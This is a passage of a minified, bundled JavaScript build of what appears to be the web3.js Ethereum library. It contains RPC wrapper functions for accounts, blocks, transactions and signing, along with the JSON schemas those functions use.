                        return a.validator.validate([
                            "string",
                            "string"
                        ], [
                            t,
                            r
                        ]), u.personalRpcMethods.importRawKey(e, t, r);
                    }), t.sendTransaction = (e, t, r)=>n(void 0, void 0, void 0, function*() {
                        const n = (0, o.formatTransaction)(t, s.ETH_DATA_FORMAT);
                        return u.personalRpcMethods.sendTransaction(e, n, r);
                    }), t.signTransaction = (e, t, r)=>n(void 0, void 0, void 0, function*() {
                        const n = (0, o.formatTransaction)(t, s.ETH_DATA_FORMAT);
                        return u.personalRpcMethods.signTransaction(e, n, r);
                    }), t.sign = (e, t, r, o)=>n(void 0, void 0, void 0, function*() {
                        a.validator.validate([
                            "string",
                            "address",
                            "string"
                        ], [
                            t,
                            r,
                            o
                        ]);
                        const n = (0, a.isHexStrict)(t) ? t : (0, i.utf8ToHex)(t);
                        return u.personalRpcMethods.sign(e, n, r, o);
                    }), t.ecRecover = (e, t, r)=>n(void 0, void 0, void 0, function*() {
                        a.validator.validate([
                            "string",
                            "string"
                        ], [
                            t,
                            r
                        ]);
                        const n = (0, a.isHexStrict)(t) ? t : (0, i.utf8ToHex)(t);
                        return u.personalRpcMethods.ecRecover(e, n, r);
                    });
            },
            9326: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.NUMBER_DATA_FORMAT = void 0;
                const n = r(9970);
                t.NUMBER_DATA_FORMAT = {
                    bytes: n.FMT_BYTES.HEX,
                    number: n.FMT_NUMBER.NUMBER
                };
            },
            6637: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.transactionBuilder = t.detectTransactionType = void 0, r(6985);
                const o = r(1435);
                i(r(1435), t), i(r(1922), t), i(r(4832), t), i(r(8650), t), i(r(3222), t), i(r(5140), t), i(r(1258), t), i(r(7460), t);
                var s = r(7350);
                Object.defineProperty(t, "detectTransactionType", {
                    enumerable: !0,
                    get: function() {
                        return s.detectTransactionType;
                    }
                });
                var a = r(223);
                Object.defineProperty(t, "transactionBuilder", {
                    enumerable: !0,
                    get: function() {
                        return a.transactionBuilder;
                    }
                }), t.default = o.Web3Eth;
            },
            3222: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.createAccessList = t.getFeeHistory = t.getProof = t.getChainId = t.getLogs = t.estimateGas = t.call = t.signTransaction = t.sign = t.sendSignedTransaction = t.sendTransaction = t.getTransactionCount = t.getTransactionReceipt = t.getTransactionFromBlock = t.getPendingTransactions = t.getTransaction = t.getUncle = t.getBlockUncleCount = t.getBlockTransactionCount = t.getBlock = t.getCode = t.getStorageAt = t.getBalance = t.getBlockNumber = t.getGasPrice = t.getHashRate = t.isMining = t.getCoinbase = t.isSyncing = t.getProtocolVersion = void 0;
                const i = r(9970), o = r(6527), s = r(9634), a = r(9247), u = r(7345), c = r(5071), l = r(1181), d = r(5900), h = r(1922), f = r(223), p = r(5140), m = r(8736), g = r(8425), y = r(4745), v = r(2117), b = r(9326), E = r(1882), A = r(4429);
                t.getProtocolVersion = (e)=>n(void 0, void 0, void 0, function*() {
                        return l.ethRpcMethods.getProtocolVersion(e.requestManager);
                    }), t.isSyncing = (e)=>n(void 0, void 0, void 0, function*() {
                        return l.ethRpcMethods.getSyncing(e.requestManager);
                    }), t.getCoinbase = (e)=>n(void 0, void 0, void 0, function*() {
                        return l.ethRpcMethods.getCoinbase(e.requestManager);
                    }), t.isMining = (e)=>n(void 0, void 0, void 0, function*() {
                        return l.ethRpcMethods.getMining(e.requestManager);
                    }), t.getHashRate = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        const r = yield l.ethRpcMethods.getHashRate(e.requestManager);
                        return (0, s.format)({
                            format: "uint"
                        }, r, t);
                    });
                }, t.getGasPrice = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        const r = yield l.ethRpcMethods.getGasPrice(e.requestManager);
                        return (0, s.format)({
                            format: "uint"
                        }, r, t);
                    });
                }, t.getBlockNumber = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        const r = yield l.ethRpcMethods.getBlockNumber(e.requestManager);
                        return (0, s.format)({
                            format: "uint"
                        }, r, t);
                    });
                }, t.getBalance = function(e, t, r = e.defaultBlock, o) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, u.isBlockTag)(r) ? r : (0, s.format)({
                            format: "uint"
                        }, r, i.ETH_DATA_FORMAT), a = yield l.ethRpcMethods.getBalance(e.requestManager, t, n);
                        return (0, s.format)({
                            format: "uint"
                        }, a, o);
                    });
                }, t.getStorageAt = function(e, t, r, o = e.defaultBlock, a) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, s.format)({
                            format: "uint"
                        }, r, i.ETH_DATA_FORMAT), c = (0, u.isBlockTag)(o) ? o : (0, s.format)({
                            format: "uint"
                        }, o, i.ETH_DATA_FORMAT), d = yield l.ethRpcMethods.getStorageAt(e.requestManager, t, n, c);
                        return (0, s.format)({
                            format: "bytes"
                        }, d, a);
                    });
                }, t.getCode = function(e, t, r = e.defaultBlock, o) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, u.isBlockTag)(r) ? r : (0, s.format)({
                            format: "uint"
                        }, r, i.ETH_DATA_FORMAT), a = yield l.ethRpcMethods.getCode(e.requestManager, t, n);
                        return (0, s.format)({
                            format: "bytes"
                        }, a, o);
                    });
                }, t.getBlock = function(e, t = e.defaultBlock, r = !1, o) {
                    return n(this, void 0, void 0, function*() {
                        let n;
                        if ((0, u.isBytes)(t)) {
                            const o = (0, s.format)({
                                format: "bytes32"
                            }, t, i.ETH_DATA_FORMAT);
                            n = yield l.ethRpcMethods.getBlockByHash(e.requestManager, o, r);
                        } else {
                            const o = (0, u.isBlockTag)(t) ? t : (0, s.format)({
                                format: "uint"
                            }, t, i.ETH_DATA_FORMAT);
                            n = yield l.ethRpcMethods.getBlockByNumber(e.requestManager, o, r);
                        }
                        return (0, s.format)(h.blockSchema, n, o);
                    });
                }, t.getBlockTransactionCount = function(e, t = e.defaultBlock, r) {
                    return n(this, void 0, void 0, function*() {
                        let n;
                        if ((0, u.isBytes)(t)) {
                            const r = (0, s.format)({
                                format: "bytes32"
                            }, t, i.ETH_DATA_FORMAT);
                            n = yield l.ethRpcMethods.getBlockTransactionCountByHash(e.requestManager, r);
                        } else {
                            const r = (0, u.isBlockTag)(t) ? t : (0, s.format)({
                                format: "uint"
                            }, t, i.ETH_DATA_FORMAT);
                            n = yield l.ethRpcMethods.getBlockTransactionCountByNumber(e.requestManager, r);
                        }
                        return (0, s.format)({
                            format: "uint"
                        }, n, r);
                    });
                }, t.getBlockUncleCount = function(e, t = e.defaultBlock, r) {
                    return n(this, void 0, void 0, function*() {
                        let n;
                        if ((0, u.isBytes)(t)) {
                            const r = (0, s.format)({
                                format: "bytes32"
                            }, t, i.ETH_DATA_FORMAT);
                            n = yield l.ethRpcMethods.getUncleCountByBlockHash(e.requestManager, r);
                        } else {
                            const r = (0, u.isBlockTag)(t) ? t : (0, s.format)({
                                format: "uint"
                            }, t, i.ETH_DATA_FORMAT);
                            n = yield l.ethRpcMethods.getUncleCountByBlockNumber(e.requestManager, r);
                        }
                        return (0, s.format)({
                            format: "uint"
                        }, n, r);
                    });
                }, t.getUncle = function(e, t = e.defaultBlock, r, o) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, s.format)({
                            format: "uint"
                        }, r, i.ETH_DATA_FORMAT);
                        let a;
                        if ((0, u.isBytes)(t)) {
                            const r = (0, s.format)({
                                format: "bytes32"
                            }, t, i.ETH_DATA_FORMAT);
                            a = yield l.ethRpcMethods.getUncleByBlockHashAndIndex(e.requestManager, r, n);
                        } else {
                            const r = (0, u.isBlockTag)(t) ? t : (0, s.format)({
                                format: "uint"
                            }, t, i.ETH_DATA_FORMAT);
                            a = yield l.ethRpcMethods.getUncleByBlockNumberAndIndex(e.requestManager, r, n);
                        }
                        return (0, s.format)(h.blockSchema, a, o);
                    });
                }, t.getTransaction = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, s.format)({
                            format: "bytes32"
                        }, t, i.DEFAULT_RETURN_FORMAT), o = yield l.ethRpcMethods.getTransactionByHash(e.requestManager, n);
                        return (0, u.isNullish)(o) ? o : (0, p.formatTransaction)(o, r, {
                            transactionSchema: h.transactionInfoSchema
                        });
                    });
                }, t.getPendingTransactions = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return (yield l.ethRpcMethods.getPendingTransactions(e.requestManager)).map((e)=>(0, p.formatTransaction)(e, t));
                    });
                }, t.getTransactionFromBlock = function(e, t = e.defaultBlock, r, o) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, s.format)({
                            format: "uint"
                        }, r, i.ETH_DATA_FORMAT);
                        let a;
                        if ((0, u.isBytes)(t)) {
                            const r = (0, s.format)({
                                format: "bytes32"
                            }, t, i.ETH_DATA_FORMAT);
                            a = yield l.ethRpcMethods.getTransactionByBlockHashAndIndex(e.requestManager, r, n);
                        } else {
                            const r = (0, u.isBlockTag)(t) ? t : (0, s.format)({
                                format: "uint"
                            }, t, i.ETH_DATA_FORMAT);
                            a = yield l.ethRpcMethods.getTransactionByBlockNumberAndIndex(e.requestManager, r, n);
                        }
                        return (0, u.isNullish)(a) ? a : (0, p.formatTransaction)(a, o, {
                            transactionSchema: h.transactionInfoSchema
                        });
                    });
                }, t.getTransactionReceipt = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, s.format)({
                            format: "bytes32"
                        }, t, i.DEFAULT_RETURN_FORMAT), o = yield l.ethRpcMethods.getTransactionReceipt(e.requestManager, n);
                        return (0, u.isNullish)(o) ? o : (0, s.format)(h.transactionReceiptSchema, o, r);
                    });
                }, t.getTransactionCount = function(e, t, r = e.defaultBlock, o) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, u.isBlockTag)(r) ? r : (0, s.format)({
                            format: "uint"
                        }, r, i.ETH_DATA_FORMAT), a = yield l.ethRpcMethods.getTransactionCount(e.requestManager, t, n);
                        return (0, s.format)({
                            format: "uint"
                        }, a, o);
                    });
                }, t.sendTransaction = function(e, t, r, a = {
                    checkRevertBeforeSending: !0
                }) {
                    const d = new o.Web3PromiEvent((o, b)=>{
                        setImmediate(()=>{
                            (()=>{
                                n(this, void 0, void 0, function*() {
                                    let _ = (0, p.formatTransaction)(Object.assign(Object.assign({}, t), {
                                        from: (0, f.getTransactionFromOrToAttr)("from", e, t),
                                        to: (0, f.getTransactionFromOrToAttr)("to", e, t)
                                    }), i.ETH_DATA_FORMAT);
                                    !(null == a ? void 0 : a.ignoreGasPricing) && (0, u.isNullish)(_.gasPrice) && ((0, u.isNullish)(t.maxPriorityFeePerGas) || (0, u.isNullish)(t.maxFeePerGas)) && (_ = Object.assign(Object.assign({}, _), (yield (0, m.getTransactionGasPricing)(_, e, i.ETH_DATA_FORMAT))));
                                    try {
                                        if (!1 !== a.checkRevertBeforeSending) {
                                            const t = yield (0, A.getRevertReason)(e, _, a.contractAbi);
                                            if (void 0 !== t) {
                                                const r = yield (0, E.getTransactionError)(e, _, void 0, void 0, a.contractAbi, t);
                                                return d.listenerCount("error") > 0 && d.emit("error", r), void b(r);
                                            }
                                        }
                                        let t, i;
                                        if (d.listenerCount("sending") > 0 && d.emit("sending", _), e.wallet && !(0, u.isNullish)(_.from) && (i = e.wallet.get(_.from)), i) {
                                            const r = yield i.signTransaction(_);
                                            t = yield (0, g.trySendTransaction)(e, ()=>n(this, void 0, void 0, function*() {
                                                    return l.ethRpcMethods.sendRawTransaction(e.requestManager, r.rawTransaction);
                                                }), r.transactionHash);
                                        } else t = yield (0, g.trySendTransaction)(e, ()=>n(this, void 0, void 0, function*() {
                                                return l.ethRpcMethods.sendTransaction(e.requestManager, _);
                                            }));
                                        const c = (0, s.format)({
                                            format: "bytes32"
                                        }, t, r);
                                        d.listenerCount("sent") > 0 && d.emit("sent", _), d.listenerCount("transactionHash") > 0 && d.emit("transactionHash", c);
                                        const f = yield (0, y.waitForTransactionReceipt)(e, t, r), p = (0, s.format)(h.transactionReceiptSchema, f, r);
                                        if (d.listenerCount("receipt") > 0 && d.emit("receipt", p), null == a ? void 0 : a.transactionResolver) o(null == a ? void 0 : a.transactionResolver(p));
                                        else if (f.status === BigInt(0)) {
                                            const t = yield (0, E.getTransactionError)(e, _, p, void 0, null == a ? void 0 : a.contractAbi);
                                            d.listenerCount("error") > 0 && d.emit("error", t), b(t);
                                        } else o(p);
                                        d.listenerCount("confirmation") > 0 && (0, v.watchTransactionForConfirmations)(e, d, p, t, r);
                                    } catch (t) {
                                        let r = t;
                                        r instanceof c.ContractExecutionError && e.handleRevert && (r = yield (0, E.getTransactionError)(e, _, void 0, void 0, null == a ? void 0 : a.contractAbi)), (r instanceof c.InvalidResponseError || r instanceof c.ContractExecutionError || r instanceof c.TransactionRevertWithCustomError || r instanceof c.TransactionRevertedWithoutReasonError || r instanceof c.TransactionRevertInstructionError) && d.listenerCount("error") > 0 && d.emit("error", r), b(r);
                                    }
                                });
                            })();
                        });
                    });
                    return d;
                }, t.sendSignedTransaction = function(e, t, r, u = {
                    checkRevertBeforeSending: !0
                }) {
                    const d = new o.Web3PromiEvent((o, f)=>{
                        setImmediate(()=>{
                            (()=>{
                                n(this, void 0, void 0, function*() {
                                    const p = (0, s.format)({
                                        format: "bytes"
                                    }, t, i.ETH_DATA_FORMAT), m = a.TransactionFactory.fromSerializedData((0, s.bytesToUint8Array)((0, s.hexToBytes)(p))), b = Object.assign(Object.assign({}, m.toJSON()), {
                                        from: m.getSenderAddress().toString()
                                    });
                                    try {
                                        if (!1 !== u.checkRevertBeforeSending) {
                                            const t = yield (0, A.getRevertReason)(e, b, u.contractAbi);
                                            if (void 0 !== t) {
                                                const r = yield (0, E.getTransactionError)(e, b, void 0, void 0, u.contractAbi, t);
                                                return d.listenerCount("error") > 0 && d.emit("error", r), void f(r);
                                            }
                                        }
                                        d.listenerCount("sending") > 0 && d.emit("sending", p);
                                        const t = yield (0, g.trySendTransaction)(e, ()=>n(this, void 0, void 0, function*() {
                                                return l.ethRpcMethods.sendRawTransaction(e.requestManager, p);
                                            }));
                                        d.listenerCount("sent") > 0 && d.emit("sent", p);
                                        const i = (0, s.format)({
                                            format: "bytes32"
                                        }, t, r);
                                        d.listenerCount("transactionHash") > 0 && d.emit("transactionHash", i);
                                        const a = yield (0, y.waitForTransactionReceipt)(e, t, r), c = (0, s.format)(h.transactionReceiptSchema, a, r);
                                        if (d.listenerCount("receipt") > 0 && d.emit("receipt", c), null == u ? void 0 : u.transactionResolver) o(null == u ? void 0 : u.transactionResolver(c));
                                        else if (a.status === BigInt(0)) {
                                            const t = yield (0, E.getTransactionError)(e, b, c, void 0, null == u ? void 0 : u.contractAbi);
                                            d.listenerCount("error") > 0 && d.emit("error", t), f(t);
                                        } else o(c);
                                        d.listenerCount("confirmation") > 0 && (0, v.watchTransactionForConfirmations)(e, d, c, t, r);
                                    } catch (t) {
                                        let r = t;
                                        r instanceof c.ContractExecutionError && e.handleRevert && (r = yield (0, E.getTransactionError)(e, b, void 0, void 0, null == u ? void 0 : u.contractAbi)), (r instanceof c.InvalidResponseError || r instanceof c.ContractExecutionError || r instanceof c.TransactionRevertWithCustomError || r instanceof c.TransactionRevertedWithoutReasonError || r instanceof c.TransactionRevertInstructionError) && d.listenerCount("error") > 0 && d.emit("error", r), f(r);
                                    }
                                });
                            })();
                        });
                    });
                    return d;
                }, t.sign = function(e, t, r, o) {
                    var a;
                    return n(this, void 0, void 0, function*() {
                        const n = (0, s.format)({
                            format: "bytes"
                        }, t, i.DEFAULT_RETURN_FORMAT);
                        if (null === (a = e.wallet) || void 0 === a ? void 0 : a.get(r)) {
                            const t = e.wallet.get(r).sign(n);
                            return (0, s.format)(h.SignatureObjectSchema, t, o);
                        }
                        if ("number" == typeof r) throw new c.SignatureError(t, 'RPC method "eth_sign" does not support index signatures');
                        const u = yield l.ethRpcMethods.sign(e.requestManager, r, n);
                        return (0, s.format)({
                            format: "bytes"
                        }, u, o);
                    });
                }, t.signTransaction = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        const n = yield l.ethRpcMethods.signTransaction(e.requestManager, (0, p.formatTransaction)(t, i.ETH_DATA_FORMAT));
                        return (0, u.isString)(n) ? (0, d.decodeSignedTransaction)(n, r) : {
                            raw: (0, s.format)({
                                format: "bytes"
                            }, n.raw, r),
                            tx: (0, p.formatTransaction)(n.tx, r)
                        };
                    });
                }, t.call = function(e, t, r = e.defaultBlock, o) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, u.isBlockTag)(r) ? r : (0, s.format)({
                            format: "uint"
                        }, r, i.ETH_DATA_FORMAT), a = yield l.ethRpcMethods.call(e.requestManager, (0, p.formatTransaction)(t, i.ETH_DATA_FORMAT), n);
                        return (0, s.format)({
                            format: "bytes"
                        }, a, o);
                    });
                }, t.estimateGas = function(e, t, r = e.defaultBlock, o) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, p.formatTransaction)(t, i.ETH_DATA_FORMAT), a = (0, u.isBlockTag)(r) ? r : (0, s.format)({
                            format: "uint"
                        }, r, i.ETH_DATA_FORMAT), c = yield l.ethRpcMethods.estimateGas(e.requestManager, n, a);
                        return (0, s.format)({
                            format: "uint"
                        }, c, o);
                    });
                }, t.getLogs = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        let { toBlock: n, fromBlock: i } = t;
                        (0, u.isNullish)(n) || "number" != typeof n && "bigint" != typeof n || (n = (0, s.numberToHex)(n)), (0, u.isNullish)(i) || "number" != typeof i && "bigint" != typeof i || (i = (0, s.numberToHex)(i));
                        const o = Object.assign(Object.assign({}, t), {
                            fromBlock: i,
                            toBlock: n
                        });
                        return (yield l.ethRpcMethods.getLogs(e.requestManager, o)).map((e)=>"string" == typeof e ? e : (0, s.format)(h.logSchema, e, r));
                    });
                }, t.getChainId = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        const r = yield l.ethRpcMethods.getChainId(e.requestManager);
                        return (0, s.format)({
                            format: "uint"
                        }, r, t);
                    });
                }, t.getProof = function(e, t, r, o = e.defaultBlock, a) {
                    return n(this, void 0, void 0, function*() {
                        const n = r.map((e)=>(0, s.format)({
                                format: "bytes"
                            }, e, i.ETH_DATA_FORMAT)), c = (0, u.isBlockTag)(o) ? o : (0, s.format)({
                            format: "uint"
                        }, o, i.ETH_DATA_FORMAT), d = yield l.ethRpcMethods.getProof(e.requestManager, t, n, c);
                        return (0, s.format)(h.accountSchema, d, a);
                    });
                }, t.getFeeHistory = function(e, t, r = e.defaultBlock, o, a) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, s.format)({
                            format: "uint"
                        }, t, i.ETH_DATA_FORMAT), c = (0, u.isBlockTag)(r) ? r : (0, s.format)({
                            format: "uint"
                        }, r, i.ETH_DATA_FORMAT), d = (0, s.format)({
                            type: "array",
                            items: {
                                format: "uint"
                            }
                        }, o, b.NUMBER_DATA_FORMAT), f = yield l.ethRpcMethods.getFeeHistory(e.requestManager, n, c, d);
                        return (0, s.format)(h.feeHistorySchema, f, a);
                    });
                }, t.createAccessList = function(e, t, r = e.defaultBlock, o) {
                    return n(this, void 0, void 0, function*() {
                        const n = (0, u.isBlockTag)(r) ? r : (0, s.format)({
                            format: "uint"
                        }, r, i.ETH_DATA_FORMAT), a = yield l.ethRpcMethods.createAccessList(e.requestManager, (0, p.formatTransaction)(t, i.ETH_DATA_FORMAT), n);
                        return (0, s.format)(h.accessListResultSchema, a, o);
                    });
                };
            },
            1922: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.accountSchema = t.storageProofSchema = t.feeHistorySchema = t.SignatureObjectSchema = t.transactionReceiptSchema = t.syncSchema = t.logSchema = t.blockHeaderSchema = t.blockSchema = t.transactionInfoSchema = t.transactionSchema = t.customChainSchema = t.hardforkSchema = t.chainSchema = t.accessListResultSchema = t.accessListSchema = t.accessListItemSchema = void 0, t.accessListItemSchema = {
                    type: "object",
                    properties: {
                        address: {
                            format: "address"
                        },
                        storageKeys: {
                            type: "array",
                            items: {
                                format: "bytes32"
                            }
                        }
                    }
                }, t.accessListSchema = {
                    type: "array",
                    items: Object.assign({}, t.accessListItemSchema)
                }, t.accessListResultSchema = {
                    type: "object",
                    properties: {
                        accessList: Object.assign({}, t.accessListSchema),
                        gasUsed: {
                            type: "string"
                        }
                    }
                }, t.chainSchema = {
                    type: "string",
                    enum: [
                        "goerli",
                        "kovan",
                        "mainnet",
                        "rinkeby",
                        "ropsten",
                        "sepolia"
                    ]
                }, t.hardforkSchema = {
                    type: "string",
                    enum: [
                        "arrowGlacier",
                        "berlin",
                        "byzantium",
                        "chainstart",
                        "constantinople",
                        "dao",
                        "homestead",
                        "istanbul",
                        "london",
                        "merge",
                        "muirGlacier",
                        "petersburg",
                        "shanghai",
                        "spuriousDragon",
                        "tangerineWhistle"
                    ]
                }, t.customChainSchema = {
                    type: "object",
                    properties: {
                        name: {
                            format: "string"
                        },
                        networkId: {
                            format: "uint"
                        },
                        chainId: {
                            format: "uint"
                        }
                    }
                }, t.transactionSchema = {
                    type: "object",
                    properties: {
                        from: {
                            format: "address"
                        },
                        to: {
                            oneOf: [
                                {
                                    format: "address"
                                },
                                {
                                    type: "null"
                                }
                            ]
                        },
                        value: {
                            format: "uint"
                        },
                        gas: {
                            format: "uint"
                        },
                        gasPrice: {
                            format: "uint"
                        },
                        effectiveGasPrice: {
                            format: "uint"
                        },
                        type: {
                            format: "uint"
                        },
                        maxFeePerGas: {
                            format: "uint"
                        },
                        maxPriorityFeePerGas: {
                            format: "uint"
                        },
                        accessList: Object.assign({}, t.accessListSchema),
                        data: {
                            format: "bytes"
                        },
                        input: {
                            format: "bytes"
                        },
                        nonce: {
                            format: "uint"
                        },
                        chain: Object.assign({}, t.chainSchema),
                        hardfork: Object.assign({}, t.hardforkSchema),
                        chainId: {
                            format: "uint"
                        },
                        networkId: {
                            format: "uint"
                        },
                        common: {
                            type: "object",
                            properties: {
                                customChain: Object.assign({}, t.customChainSchema),
                                baseChain: Object.assign({}, t.chainSchema),
                                hardfork: Object.assign({}, t.hardforkSchema)
                            }
                        },
                        gasLimit: {
                            format: "uint"
                        },
                        v: {
                            format: "uint"
                        },
                        r: {
                            format: "bytes32"
                        },
                        s: {
                            format: "bytes32"
                        }
                    }
                }, t.transactionInfoSchema = {
                    type: "object",
                    properties: Object.assign(Object.assign({}, t.transactionSchema.properties), {
                        blockHash: {
                            format: "bytes32"
                        },
                        blockNumber: {
                            format: "uint"
                        },
                        hash: {
                            format: "bytes32"
                        },
                        transactionIndex: {
                            format: "uint"
                        },
                        from: {
                            format: "address"
                        },
                        to: {
                            oneOf: [
                                {
                                    format: "address"
                                },
                                {
                                    type: "null"
                                }
                            ]
                        },
                        value: {
                            format: "uint"
                        },
                        gas: {
                            format: "uint"
                        },
                        gasPrice: {
                            format: "uint"
                        },
                        effectiveGasPrice: {
                            format: "uint"
                        },
                        type: {
                            format: "uint"
                        },
                        maxFeePerGas: {
                            format: "uint"
                        },
                        maxPriorityFeePerGas: {
                            format: "uint"
                        },
                        accessList: Object.assign({}, t.accessListSchema),
                        data: {
                            format: "bytes"
                        },
                        input: {
                            format: "bytes"
                        },
                        nonce: {
                            format: "uint"
                        },
                        gasLimit: {
                            format: "uint"
                        },
                        v: {
                            format: "uint"
                        },
                        r: {
                            format: "bytes32"
                        },
                        s: {
                            format: "bytes32"
                        }
                    })
                }, t.blockSchema = {
                    type: "object",
                    properties: {
                        parentHash: {
                            format: "bytes32"
                        },
                        sha3Uncles: {
                            format: "bytes32"
                        },
                        miner: {
                            format: "bytes"
                        },
                        stateRoot: {
                            format: "bytes32"
                        },
                        transactionsRoot: {
                            format: "bytes32"
                        },
                        receiptsRoot: {
                            format: "bytes32"
                        },
                        logsBloom: {
                            format: "bytes256"
                        },
                        difficulty: {
                            format: "uint"
                        },
                        number: {
                            format: "uint"
                        },
                        gasLimit: {
                            format: "uint"
                        },
                        gasUsed: {
                            format: "uint"
                        },
                        timestamp: {
                            format: "uint"
                        },
                        extraData: {
                            format: "bytes"
                        },
                        mixHash: {
                            format: "bytes32"
                        },
                        nonce: {
                            format: "uint"
                        },
                        totalDifficulty: {
                            format: "uint"
                        },
                        baseFeePerGas: {
                            format: "uint"
                        },
                        size: {
                            format: "uint"
                        },
                        transactions: {
                            oneOf: [
                                {
                                    type: "array",
                                    items: Object.assign({}, t.transactionInfoSchema)
                                },
                                {
                                    type: "array",
                                    items: {
                                        format: "bytes32"
                                    }
                                }
                            ]
                        },
                        uncles: {
                            type: "array",
                            items: {
                                format: "bytes32"
                            }
                        },
                        hash: {
                            format: "bytes32"
                        }
                    }
                }, t.blockHeaderSchema = {
                    type: "object",
                    properties: {
                        parentHash: {
                            format: "bytes32"
                        },
                        receiptRoot: {
                            format: "bytes32"
                        },
                        miner: {
                            format: "bytes"
                        },
                        stateRoot: {
                            format: "bytes32"
                        },
                        transactionsRoot: {
                            format: "bytes32"
                        },
                        logsBloom: {
                            format: "bytes256"
                        },
                        difficulty: {
                            format: "uint"
                        },
                        number: {
                            format: "uint"
                        },
                        gasLimit: {
                            format: "uint"
                        },
                        gasUsed: {
                            format: "uint"
                        },
                        timestamp: {
                            format: "uint"
                        },
                        extraData: {
                            format: "bytes"
                        },
                        nonce: {
                            format: "uint"
                        },
                        sha3Uncles: {
                            format: "bytes32"
                        }
                    }
                }, t.logSchema = {
                    type: "object",
                    properties: {
                        removed: {
                            format: "bool"
                        },
                        logIndex: {
                            format: "uint"
                        },
                        transactionIndex: {
                            format: "uint"
                        },
                        transactionHash: {
                            format: "bytes32"
                        },
                        blockHash: {
                            format: "bytes32"
                        },
                        blockNumber: {
                            format: "uint"
                        },
                        address: {
                            format: "address"
                        },
                        data: {
                            format: "bytes"
                        },
                        topics: {
                            type: "array",
                            items: {
                                format: "bytes32"
                            }
                        }
                    }
                }, t.syncSchema = {
                    type: "object",
                    properties: {
                        startingBlock: {
                            format: "string"
                        },
                        currentBlock: {
                            format: "string"
                        },
                        highestBlock: {
                            format: "string"
                        },
                        knownStates: {
                            format: "string"
                        },
                        pulledStates: {
                            format: "string"
                        }
                    }
                }, t.transactionReceiptSchema = {
                    type: "object",
                    properties: {
                        transactionHash: {
                            format: "bytes32"
                        },
                        transactionIndex: {
                            format: "uint"
                        },
                        blockHash: {
                            format: "bytes32"
                        },
                        blockNumber: {
                            format: "uint"
                        },
                        from: {
                            format: "address"
                        },
                        to: {
                            format: "address"
                        },
                        cumulativeGasUsed: {
                            format: "uint"
                        },
                        gasUsed: {
                            format: "uint"
                        },
                        effectiveGasPrice: {
                            format: "uint"
                        },
                        contractAddress: {
                            format: "address"
                        },
                        logs: {
                            type: "array",
                            items: Object.assign({}, t.logSchema)
                        },
                        logsBloom: {
                            format: "bytes"
                        },
                        root: {
                            format: "bytes"
                        },
                        status: {
                            format: "uint"
                        },
                        type: {
                            format: "uint"
                        }
                    }
                }, t.SignatureObjectSchema = {
                    type: "object",
                    properties: {
                        messageHash: {
                            format: "bytes"
                        },
                        r: {
                            format: "bytes32"
                        },
                        s: {
                            format: "bytes32"
                        },
                        v: {
                            format: "bytes"
                        },
                        message: {
                            format: "bytes"
                        },
                        signature: {
                            format: "bytes"
                        }
                    }
                }, t.feeHistorySchema = {
                    type: "object",
                    properties: {
                        oldestBlock: {
                            format: "uint"
                        },
                        baseFeePerGas: {
                            type: "array",
                            items: {
                                format: "uint"
                            }
                        },
                        reward: {
                            type: "array",
                            items: {
                                type: "array",
                                items: {
                                    format: "uint"
                                }
                            }
                        },
                        gasUsedRatio: {
                            type: "array",
                            items: {
                                type: "number"
                            }
                        }
                    }
                }, t.storageProofSchema = {
                    type: "object",
                    properties: {
                        key: {
                            format: "bytes32"
                        },
                        value: {
                            format: "uint"
                        },
                        proof: {
                            type: "array",
                            items: {
                                format: "bytes32"
                            }
                        }
                    }
                }, t.accountSchema = {
                    type: "object",
                    properties: {
                        balance: {
                            format: "uint"
                        },
                        codeHash: {
                            format: "bytes32"
                        },
                        nonce: {
                            format: "uint"
                        },
                        storageHash: {
                            format: "bytes32"
                        },
                        accountProof: {
                            type: "array",
                            items: {
                                format: "bytes32"
                            }
                        },
                        storageProof: {
                            type: "array",
                            items: Object.assign({}, t.storageProofSchema)
                        }
                    }
                };
            },
            4832: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            5900: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.decodeSignedTransaction = void 0;
                const n = r(9634), i = r(9247), o = r(7350), s = r(5140);
